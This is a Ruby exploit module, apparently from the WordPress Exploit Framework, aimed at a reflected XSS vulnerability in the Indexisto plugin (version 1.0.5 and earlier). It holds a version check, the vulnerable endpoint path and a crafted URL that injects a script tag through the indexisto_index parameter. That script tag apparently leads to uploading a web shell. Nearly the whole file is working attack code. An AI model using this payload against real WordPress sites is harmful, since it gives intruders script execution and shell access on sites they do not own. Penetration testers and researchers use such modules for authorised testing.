# frozen_string_literal: true

class Wpxf::Exploit::IndexistoReflectedXssShellUpload < Wpxf::Module
  include Wpxf::WordPress::ReflectedXss

  def initialize
    super

    update_info(
      name: 'Indexisto <= 1.0.5 Reflected XSS Shell Upload',
      author: [
        'Larry W. Cashdollar', # Discovery
        'rastating'            # WPXF module
      ],
      references: [
        ['WPVDB', '8453'],
        ['URL', 'http://www.vapidlabs.com/wp/wp_advisory.php?v=38']
      ],
      date: 'Feb 09 2016'
    )
  end

  def check
    check_plugin_version_from_readme('indexisto')
  end

  def vulnerable_url
    normalize_uri(wordpress_url_plugins, 'indexisto', 'assets', 'js', 'indexisto-inject.php')
  end

  def url_with_xss
    "#{vulnerable_url}?indexisto_index=%22%3E%3Cscript%3E#{xss_ascii_encoded_include_script}%3C%2Fscript%3E%3C%22"
  end
end
